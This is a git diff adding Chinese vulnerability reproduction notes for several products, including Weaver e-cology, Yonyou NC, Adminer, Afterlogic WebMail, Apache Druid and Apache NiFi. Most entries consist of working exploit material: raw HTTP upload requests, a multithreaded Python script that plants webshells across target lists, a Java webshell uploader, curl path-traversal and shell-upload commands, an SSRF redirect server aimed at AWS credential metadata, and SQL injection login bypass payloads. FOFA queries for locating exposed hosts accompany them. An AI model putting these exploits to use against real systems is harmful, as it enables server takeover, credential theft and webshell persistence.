diff --git a/CMS漏洞/Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342.md b/CMS漏洞/Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342.md
new file mode 100644
index 0000000..a86b3f5
--- /dev/null
+++ b/CMS漏洞/Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342.md
@@ -0,0 +1,23 @@
+# Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342
+
+## 漏洞描述
+
+- https://packetstormsecurity.com/files/161048/anchorcms0127-xsrf.txt
+
+## FOFA
+
+```
+"Anchor CMS" && body="themes/default/img/favicon.png"
+```
+
+## 漏洞复现
+
+Anchor CMS使用Get方法进行敏感操作,可以使用exploit.html进行删除用户等操作。
+
+**exploit.html:**
+
+```html
+
+```
+
+当管理员点击时删除ID为21的用户。
\ No newline at end of file
diff --git a/OA产品漏洞/泛微OA E-cology KtreeUploadAction 任意文件上传.md b/OA产品漏洞/泛微OA E-cology KtreeUploadAction 任意文件上传.md
new file mode 100644
index 0000000..e6fb4a3
--- /dev/null
+++ b/OA产品漏洞/泛微OA E-cology KtreeUploadAction 任意文件上传.md
@@ -0,0 +1,45 @@ +# 泛微OA E-cology KtreeUploadAction 任意文件上传 + +## 漏洞描述 + +参考链接: + +- [泛微e-cology任意文件上传(已修复)](https://mp.weixin.qq.com/s?__biz=MzkxMzIzNTU5Mg==&mid=2247483666&idx=1&sn=e70efe98c064e0f1df986e2b65c1a608&chksm=c1018af5f67603e39ce4d6e9375875e63e7b80633a1f99959f8d4652193ac3734765a99099ea&mpshare=1&scene=23&srcid=0414cqXy50udQOy19LYOMega&sharer_sharetime=1618332600979&sharer_shareid=d15208c7b27f111e2fe465f389ab6fac#rd) + +## 影响版本 + +``` +目前已修复 +``` + +## 漏洞复现 + +定位文件: + +`ecology\CLASSB~1\com\weaver\formmodel\apps\ktree\servlet\KtreeUploadAction.class` + +exp: + +``` + +POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 +Content-Type: multipart/form-data; boundary=--------1638451160 +Content-Length: 171 + +----------1638451160 +Content-Disposition: form-data; name="test"; filename="test.jsp" +Content-Type: image/jpeg + +helloword +----------1638451160-- +``` + diff --git a/OA产品漏洞/泛微OA WorkflowServiceXml RCE.md b/OA产品漏洞/泛微OA E-cology WorkflowServiceXml RCE.md similarity index 99% rename from OA产品漏洞/泛微OA WorkflowServiceXml RCE.md rename to OA产品漏洞/泛微OA E-cology WorkflowServiceXml RCE.md index 499fd97..59c2d98 100644 --- a/OA产品漏洞/泛微OA WorkflowServiceXml RCE.md +++ b/OA产品漏洞/泛微OA E-cology WorkflowServiceXml RCE.md @@ -1,4 +1,4 @@ -# 泛微OA WorkflowServiceXml RCE +# 泛微OA E-cology WorkflowServiceXml RCE ## 漏洞描述 diff --git a/OA产品漏洞/用友 NC FileReceiveServlet 反序列化RCE漏洞.md b/OA产品漏洞/用友 NC FileReceiveServlet 反序列化RCE漏洞.md new file mode 100644 index 0000000..82a82ee --- /dev/null 
+++ b/OA产品漏洞/用友 NC FileReceiveServlet 反序列化RCE漏洞.md 
@@ -0,0 +1,197 @@ +# 用友 NC FileReceiveServlet 反序列化RCE漏洞 + +## 漏洞描述 + +用友NC 存在反序列化 RCE漏洞,攻击者可利用控制服务器 + +## 漏洞影响 + +``` +用友NC 6.5 +``` + +## FOFA + +``` +app="用友-UFIDA-NC" +``` + +## 漏洞复现 + +首先从任意文件上传说起 + +任意文件上传分析代码在`servlet.FileReceiveServlet`。在这里我们可以看到,从请求中读取流,然后转换为map类型并读取上传文件的路径。然后再读取待上传的文件。 + +![yongyou-5-1](./images/yongyou-5-1.png) + +而网上很多poc,大多都是基于此漏洞,利用反序列化上传一个文件到服务器。 + +这也就是去年的那个任意文件上传的反序列化漏洞。但是,但是,这个漏洞本质是一个反序列化漏洞。而且某C的classpath中,也存在apache commonscollections库,我们可以利用这个库,直接执行命令或者内存马。岂不是比任意文件上传舒服多了。 + +**内存马** + +老样子,在反序列化中想执行任意代码,一般都依靠xalan这个库。这次也不例外。 + +植入内存马,关键在于我们怎样找到context,只有找到context,我们才可以添加filter。好在某c中,我们只需要通过下面的代码既可以获取当前context,不需要从tomcat中获取context + +```java + Object obj = 改动Locator.getInstance().lookup("ServletContext"); + Field contextField = obj.getClass().getDeclaredField("context"); + contextField.setAccessible(true); + obj = contextField.get(obj); + Field contextField1 = obj.getClass().getDeclaredField("context"); + contextField1.setAccessible(true); + addFitlertoTomcat(contextField1.get(obj)); +``` + +剩下的就是常规操作,可以看我之前的内存马模型,基本不需要很大的改动即可完美适配。 + +![yongyou-5-2](./images/yongyou-5-2.png) + +**回显** + +我们只需要找到这样一个servlet,即存在反序列化的readObject,又将错误信息写入到response中 + +不难看出 uploadServlet 就很满足这个需求。 + +```plain +out = new ObjectOutputStream(output); + in = new ObjectInputStream(request.getInputStream()); + String dsName = (String)in.readObject(); + } + } catch (Exception var14) { + var14.printStackTrace(); + if (out == null) { + throw new ServletException(var14); + } + + out.writeObject(var14); +``` + +如果出错的话,将错误信息通过序列化写入到response中。好处在于,我们不需要麻烦的去找tomcat的response对象。 + +所以,我们将反序列化的payload,发送给uploadServlet即可。然后我们只需要读取响应,即可拿到服务器命令执行的回显结果。客户端代码可以这样写 + +```java + ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(r)); + Exception e = (Exception) objectInputStream.readObject(); + Object obj = e.getCause(); + Field targetF = obj.getClass().getDeclaredField("target"); + targetF.setAccessible(true); + obj = targetF.get(obj); + Field 
msgF = obj.getClass().getSuperclass().getDeclaredField("detailMessage"); + msgF.setAccessible(true); + String msg = msgF.get(obj).toString(); + System.out.println(msg); +``` + +### 文件上传EXP + +python exp: + +``` +import requests +import threadpool +import urllib3 +import sys +import argparse + +urllib3.disable_warnings() +proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'} +header = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36", + "Content-Type": "application/x-www-form-urlencoded", + "Referer": "https://google.com", +} + +def multithreading(funcname, filename="url.txt", pools=5): + works = [] + with open(filename, "r") as f: + for i in f: + func_params = [i.rstrip("\n")] + works.append((func_params, None)) + pool = threadpool.ThreadPool(pools) + reqs = threadpool.makeRequests(funcname, works) + [pool.putRequest(req) for req in reqs] + pool.wait() + +def wirte_targets(vurl, filename): + with open(filename, "a+") as f: + f.write(vurl + "\n") + return vurl + +def exp(u): + uploadHeader = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36", + "Content-Type": "multipart/form-data;", + "Referer": "https://google.com" + } + uploadData = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78" + shellFlag="t0test0ls" + uploadData+=shellFlag + try: + req1 = requests.post(u + 
"/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25) + if req1.status_code == 200 : + req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25) + + if req3.text.index(shellFlag)>=0: + printFlag = "[Getshell]" + u+"/t00ls.jsp" + "\n" + print (printFlag) + wirte_targets(printFlag, "vuln.txt") + except : + pass + #print(printFlag, end="") + + +if __name__ == "__main__": + if (len(sys.argv)) < 2: + print('useage : python' +str(sys.argv[0]) + ' -h') + else: + parser =argparse.ArgumentParser() + parser.description ='YONYOU UC 6.5 FILE UPLOAD!' + parser.add_argument('-u',help="url -> example http://127.0.0.1",type=str,dest='check_url') + parser.add_argument('-r',help="url list to file",type=str,dest='check_file') + args =parser.parse_args() + if args.check_url: + exp(args.check_url) + + if(args.check_file): + multithreading(exp, args.check_file, 8) +``` + +java exp: + +``` +import java.io.*; +import java.util.HashMap; +import java.util.Map; + +public class App { + public static void main(String[] args) throws Exception { + String url="http://192.168.40.222"; + Map metaInfo=new HashMap(); + metaInfo.put("TARGET_FILE_PATH","webapps/nc_web"); + metaInfo.put("FILE_NAME","cmd.jsp"); + ByteArrayOutputStream baos=new ByteArrayOutputStream(); + ObjectOutputStream oos=new ObjectOutputStream(baos); + oos.writeObject(metaInfo); + InputStream in=App.class.getResourceAsStream("cmd.jsp"); + byte[] buf=new byte[1024]; + int len=0; + while ((len=in.read(buf))!=-1){ + baos.write(buf,0,len); + } + HttpClient.post(url+"/servlet/FileReceiveServlet",baos.toByteArray()); + HttpResult result=HttpClient.get(url+"/cmd.jsp?cmd=echo+aaaaaa"); + if(result.getData().contains("aaaaaa")){ + System.out.println("shell路径:"+url+"/cmd.jsp?cmd=whoami"); + }else{ + System.out.println("上传shell失败或者漏洞不存在"); + } + } +} +``` + +## 参考文章 + +https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w \ No newline at end of file 
diff --git a/OA产品漏洞/用友 NC 反序列化RCE漏洞.md b/OA产品漏洞/用友 NC 反序列化RCE漏洞.md
deleted file mode 100644
index 4fdbbcf..0000000
--- a/OA产品漏洞/用友 NC 反序列化RCE漏洞.md
+++ /dev/null
@@ -1,84 +0,0 @@ -# 用友 NC 反序列化RCE漏洞 - -## 漏洞描述 - -用友NC 存在反序列化 RCE漏洞,攻击者可利用控制服务器 - -## 漏洞影响 - -``` -用友 NC -``` - -## 漏洞复现 - -首先从任意文件上传说起 - -任意文件上传分析代码在`servlet.FileReceiveServlet`。在这里我们可以看到,从请求中读取流,然后转换为map类型并读取上传文件的路径。然后再读取待上传的文件。 - -![yongyou-5-1](./images/yongyou-5-1.png) - -而网上很多poc,大多都是基于此漏洞,利用反序列化上传一个文件到服务器。 - -这也就是去年的那个任意文件上传的反序列化漏洞。但是,但是,这个漏洞本质是一个反序列化漏洞。而且某C的classpath中,也存在apache commonscollections库,我们可以利用这个库,直接执行命令或者内存马。岂不是比任意文件上传舒服多了。 - -**内存马** - -老样子,在反序列化中想执行任意代码,一般都依靠xalan这个库。这次也不例外。 - -植入内存马,关键在于我们怎样找到context,只有找到context,我们才可以添加filter。好在某c中,我们只需要通过下面的代码既可以获取当前context,不需要从tomcat中获取context - -```java - Object obj = 改动Locator.getInstance().lookup("ServletContext"); - Field contextField = obj.getClass().getDeclaredField("context"); - contextField.setAccessible(true); - obj = contextField.get(obj); - Field contextField1 = obj.getClass().getDeclaredField("context"); - contextField1.setAccessible(true); - addFitlertoTomcat(contextField1.get(obj)); -``` - -剩下的就是常规操作,可以看我之前的内存马模型,基本不需要很大的改动即可完美适配。 - -![yongyou-5-2](./images/yongyou-5-2.png) - -**回显** - -我们只需要找到这样一个servlet,即存在反序列化的readObject,又将错误信息写入到response中 - -不难看出 uploadServlet 就很满足这个需求。 - -```plain -out = new ObjectOutputStream(output); - in = new ObjectInputStream(request.getInputStream()); - String dsName = (String)in.readObject(); - } - } catch (Exception var14) { - var14.printStackTrace(); - if (out == null) { - throw new ServletException(var14); - } - - out.writeObject(var14); -``` - -如果出错的话,将错误信息通过序列化写入到response中。好处在于,我们不需要麻烦的去找tomcat的response对象。 - -所以,我们将反序列化的payload,发送给uploadServlet即可。然后我们只需要读取响应,即可拿到服务器命令执行的回显结果。客户端代码可以这样写 - -```java - ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(r)); - Exception e = (Exception) objectInputStream.readObject(); - Object obj = e.getCause(); - Field targetF = obj.getClass().getDeclaredField("target"); - targetF.setAccessible(true); - obj = targetF.get(obj); - Field msgF = 
obj.getClass().getSuperclass().getDeclaredField("detailMessage"); - msgF.setAccessible(true); - String msg = msgF.get(obj).toString(); - System.out.println(msg); -``` - -## 参考文章 - -https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w \ No newline at end of file diff --git a/Web应用漏洞/Adminer-SSRF漏洞 CVE-2021-21311.md b/Web应用漏洞/Adminer-SSRF漏洞 CVE-2021-21311.md new file mode 100644 index 0000000..67da1ef --- /dev/null +++ b/Web应用漏洞/Adminer-SSRF漏洞 CVE-2021-21311.md 
@@ -0,0 +1,87 @@ +# Adminer SSRF漏洞 CVE-2021-21311 + +## 漏洞描述 + +使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。 + +参考链接: + +- https://github.com/advisories/GHSA-x5r2-hj5c-8jx6 +- https://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd + +## 漏洞复现 + +首先,启动一个python服务器,该服务器侦听传入的连接并以301重定向响应到任意选择的主机。在此示例情况下,重定向指向AWS元数据服务: + +``` +http://169.254.169.254/latest/meta-data/instance-id +``` + +然后,在Adminer中使用Elasticsearch登录模块“登录”运行python代码的服务器,这导致Adminer从包含服务器的AWS实例ID的元数据服务器打印json响应。 + +![](images/16133787776790.jpg) + + +重定向请求的python脚本: + + +```py +#!/usr/bin/env python + +import SimpleHTTPServer +import SocketServer +import sys +import argparse + +def redirect_handler_factory(url): + """ + Returns a request handler class that redirects to supplied `url` + """ + class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): + def do_GET(self): + self.send_response(301) + self.send_header('Location', url) + self.end_headers() + + def do_POST(self): + self.send_response(301) + self.send_header('Location', url) + self.end_headers() + + return RedirectHandler + + +def main(): + + parser = argparse.ArgumentParser(description='HTTP redirect server') + + parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on') + parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on') + parser.add_argument('redirect_url', action="store") + + myargs = parser.parse_args() + + redirect_url = myargs.redirect_url + port = myargs.port + host = myargs.ip + + redirectHandler = redirect_handler_factory(redirect_url) + + handler = SocketServer.TCPServer((host, port), redirectHandler) + print("serving at port %s" % port) + handler.serve_forever() + +if __name__ == "__main__": + main() + +``` + + +``` +http://169.254.169.254/latest/meta-data/iam/security-credentials/ //列出服务器的可用角色。 +``` + +![](images/16133787994051.jpg) + + + 
diff --git a/Web应用漏洞/Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087.md b/Web应用漏洞/Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087.md
new file mode 100644
index 0000000..547c14f
--- /dev/null
+++ b/Web应用漏洞/Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087.md
@@ -0,0 +1,43 @@
+# Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087
+
+## 漏洞描述
+
+Adobe ColdFusion是一个快速应用程序开发平台。Adobe ColdFusion 存在远程代码执行漏洞,由于过滤不严,未经授权的攻击者可构造恶意请求,造成任意代码执行,控制服务器。建议相关用户尽快采取安全措施阻止漏洞攻击。
+
+参考链接:
+
+- https://nosec.org/home/detail/4707.html
+- https://github.com/projectdiscovery/nuclei-templates/pull/1128/files
+- https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
+
+## 漏洞影响
+
+```
+Adobe ColdFusion 2021 <= Version 2021.0.0.323925
+Adobe ColdFusion 2018 <= Update 10
+Adobe ColdFusion 2016 <= Update 16
+```
+
+## FOFA
+
+```
+app="Adobe-ColdFusion"
+```
+
+## 漏洞复现
+
+```
+ - method: GET
+ path:
+ - "{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js"
+ - "{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js"
+ - "{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js"
+ - "{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js"
+ - "{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js"
+ - "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js"
+ - "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
+
+regex:
+ - 'eval\(\"\(\"\+json\+\"\)\"\)'
+```
+
diff --git a/Web应用漏洞/Afterlogic Aurora & WebMail Pro 任意文件读取 CVE-2021-26294.md b/Web应用漏洞/Afterlogic Aurora & WebMail Pro 任意文件读取 CVE-2021-26294.md
new file mode 100644
index 0000000..b5f0049
--- /dev/null
+++ b/Web应用漏洞/Afterlogic Aurora & WebMail Pro 任意文件读取 CVE-2021-26294.md
@@ -0,0 +1,25 @@
+# Afterlogic Aurora & WebMail Pro 任意文件读取CVE-2021-26294
+
+## 漏洞描述
+
+攻击者可以通过caldav_public_user@localhost用户登录,不需要其它用户信息就可以读取配置文件从而获得敏感信息。
+
+参考链接:
+
+- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26294
+- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
+- https://forum.ywhack.com/thread-115326-1-8.html
+
+## 漏洞影响
+
+```
+WebMail Pro ≤ 7.7.9
+Afterlogic Aurora ≤ 7.7.9
+```
+
+## 漏洞复现
+
+```
+curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
+```
+
diff --git a/Web应用漏洞/Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293.md b/Web应用漏洞/Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293.md
new file mode 100644
index 0000000..f38709e
--- /dev/null
+++ b/Web应用漏洞/Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293.md
@@ -0,0 +1,33 @@
+# Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293
+
+## 漏洞描述
+
+该漏洞是由于Afterlogic Aurora & WebMail Pro中对上传的文件过滤和限制存在缺陷,攻击者可以通过上传恶意文件,从而执行任意代码。
+
+参考链接:
+
+- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26293
+- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26293-rce-via-public-unrestricted-file-upload-vulnerability.md
+- https://forum.ywhack.com/thread-115325-1-8.html
+
+## 漏洞影响
+
+```
+WebMail Pro ≤ 7.7.9
+Afterlogic Aurora ≤ 7.7.9
+```
+
+## 漏洞复现
+
+```bash
+curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"
+```
+
+默认路径为/var/www/html,也可能更改配置为其它路径,可以尝试其它方式获取。
+
+
+```bash
+curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
+//使用无效路径获取SabreDAV错误查看Webroot路径
+```
+
diff --git a/Web应用漏洞/images/16133787776790.jpg b/Web应用漏洞/images/16133787776790.jpg
new file mode 100644
index 0000000..6765f6c
Binary files /dev/null and b/Web应用漏洞/images/16133787776790.jpg differ
diff --git a/Web应用漏洞/images/16133787994051.jpg b/Web应用漏洞/images/16133787994051.jpg
new file mode 100644
index 0000000..37634d1
Binary files /dev/null and b/Web应用漏洞/images/16133787994051.jpg differ
diff --git a/Web应用漏洞/员工管理系统 Employee Management System 1.0 身份验证绕过.md b/Web应用漏洞/员工管理系统 Employee Management System 1.0 身份验证绕过.md
new file mode 100644
index 0000000..d5d37a3
--- /dev/null
+++ b/Web应用漏洞/员工管理系统 Employee Management System 1.0 身份验证绕过.md
@@ -0,0 +1,49 @@ +# 员工管理系统 Employee Management System 1.0 身份验证绕过 + +## 漏洞描述 + +漏洞发现时间:2020-10-16 + +软件下载地址:https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip + +验证环境:Windows 10 + xampp v3.2.4 + +参考链接: + +- https://www.exploit-db.com/exploits/48882 + +## 漏洞复现 + +打开网址: + +``` +http://localhost:8081/Employee%20Management%20System/alogin.html +``` + +通过payload绕过验证: + +``` +anki' or 1=1# +``` + +发送请求: + +``` +POST /Employee%20Management%20System/process/aprocess.php HTTP/1.1 +Host: localhost:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 70 +Origin: http://localhost:8081 +Connection: close +Referer: http://localhost:8081/Employee%20Management%20System/alogin.html +Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv +Upgrade-Insecure-Requests: 1 + +mailuid=anki%27+or+1%3D1%23&pwd=anki%27+or+1%3D1%23&login-submit=Login +``` + +将以Admin身份登录应用 \ No newline at end of file diff --git a/Web应用漏洞/金山 V8 V9 终端安全系统 文件上传漏洞.md b/Web应用漏洞/金山 V8 V9 终端安全系统 文件上传漏洞.md new file mode 100644 index 0000000..7369469 --- /dev/null +++ b/Web应用漏洞/金山 V8 V9 终端安全系统 文件上传漏洞.md @@ -0,0 +1,21 @@ +# 金山 V8 V9 终端安全系统 文件上传漏洞 + +## 漏洞描述 + +参考链接: + +- https://forum.butian.net/share/76 + +## 漏洞复现 + +在tools目录下的mange下存在一个upload.php。该文件可导致任意文件上传。 + +poc: + +``` +POST /tools/manage/upload.php HTTP/1.1 +HOST: target +... + +``` + diff --git a/Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md b/Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md new file mode 100644 index 0000000..e0033f6 --- /dev/null +++ b/Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md 
@@ -0,0 +1,22 @@ +# 阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592 + +## 漏洞描述 + +阿里巴巴otter manager分布式数据库同步系统是基于数据库增量日志解析,准实时同步到本机房或异地机房的mysql/oracle数据库,一个分布式数据库同步系统。阿里巴巴otter manager分布式数据库同步系统存在信息泄露漏洞,攻击者可利用漏洞获取zookper信息。 + +参考链接: + +* https://www.cnvd.org.cn/flaw/show/CNVD-2021-16592 +* https://forum.ywhack.com/thread-115309-1-8.html + +## FOFA + +``` +title="Otter Manager" +``` + +## 漏洞复现 + +默认口令:`admin/admin` + +进入后直接f12查看元素,修改password为text即可查看数据库等敏感信息密码。 \ No newline at end of file diff --git a/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-25646.md b/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-25646.md index b02ae8c..3e02cb1 100644 --- a/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-25646.md +++ b/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-25646.md @@ -4,7 +4,15 @@ Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 -Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码 +Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。 + +参考链接: + +* https://github.com/apache/druid/issues/2434 +* https://forum.ywhack.com/thread-115083-1-1.html +* https://druid.apache.org/docs/latest/operations/api-reference.html#broker +* https://lists.apache.org/thread.html/r20e0c3b10ae2c05a3aad40f1476713c45bdefc32c920b9986b941d8f@%3Cannounce.apache.org%3E +* https://www.o2oxy.cn/3090.html ## 漏洞影响 diff --git a/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-26919.md b/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-26919.md new file mode 100644 index 0000000..da84916 --- /dev/null +++ b/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-26919.md 
@@ -0,0 +1,29 @@
+# Apache Druid 远程代码执行漏洞 CVE-2021-26919
+
+## 漏洞描述
+
+Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。2021年3月30日,Apache Druid官方发布安全更新,修复了 CVE-2021-26919 Apache Druid 远程代码执行漏洞。由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。
+
+参考链接:
+
+* http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
+* https://help.aliyun.com/noticelist/articleid/1060822985.html
+
+## 漏洞影响
+
+```
+Apache Druid < 0.20.2
+```
+
+## 漏洞复现
+
+jdbc触发点:https://druid.apache.org/docs/0.19.0/development/extensions-core/druid-lookups.html#polling-lookup
+
+poc:
+
+```
+url = "jdbc:mysql://localhost:3307/?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&maxAllowedPacket=65535"
+user ="cb1"
+password="password"
+```
+
diff --git a/Web服务器漏洞/Apache NiFi Api 远程代码执行 RCE.md b/Web服务器漏洞/Apache NiFi Api 远程代码执行 RCE.md
new file mode 100644
index 0000000..660bf6a
--- /dev/null
+++ b/Web服务器漏洞/Apache NiFi Api 远程代码执行 RCE.md
@@ -0,0 +1,126 @@ +# Apache NiFi Api 远程代码执行 RCE + +## 漏洞描述 + +Apache NiFi是Apache Software Foundation的一个软件项目,旨在使软件系统之间的数据流自动化。 + +参考链接: + +- https://twitter.com/chybeta/status/1333341820596568065 +- https://github.com/imjdl/Apache-NiFi-Api-RCE +- https://forum.ywhack.com/thread-114763-1-3.html + +## FOFA + +``` +"nifi" && title=="NiFi" +``` + +## 漏洞复现 + +exp: + +```python +import sys +import json +import requests as req + + +class Exp: + def __init__(self, url): + self.url = url + + def check_is_vul(self): + url = self.url + "/nifi-api/access/config" + try: + res = req.get(url=url, verify=False) + data = res.json() + return not data["config"]["supportsLogin"] + except Exception as e: + pass + return False + + def clean_up(self, p_id): + url = self.url + "/nifi-api/processors/" + p_id + "/run-status" + data = {'revision': {'clientId': 'x', 'version': 1}, 'state': 'STOPPED'} + req.put(url=url, data=json.dumps(data), verify=False) + req.delete(url + "/threads", verify=False) + + def exploit(self, cmd): + g_id = self.fetch_process_group() + if g_id: + p_id = self.create_process(g_id) + if p_id: + self.run_cmd(p_id=p_id, cmd=cmd) + self.clean_up(p_id=p_id) + + def run_cmd(self, p_id, cmd): + url = self.url + "/nifi-api/processors/" + p_id + cmd = cmd.split(" ") + data = { + 'component': { + 'config': { + 'autoTerminatedRelationships': ['success'], + 'properties': { + 'Command': cmd[0], + 'Command Arguments': " ".join(cmd[1:]), + }, + 'schedulingPeriod': '3600 sec' + }, + 'id': p_id, + 'state': 'RUNNING' + }, + 'revision': {'clientId': 'x', 'version': 1} + } + print(data) + headers = { + "Content-Type": "application/json", + } + res = req.put(url=url, data=json.dumps(data), headers=headers, verify=False) + return res.json() + + def fetch_process_group(self): + url = self.url + "/nifi-api/process-groups/root" + try: + res = req.get(url=url, verify=False) + data = res.json()["id"] + return data + except Exception as e: + pass + return 0 + + def create_process(self, 
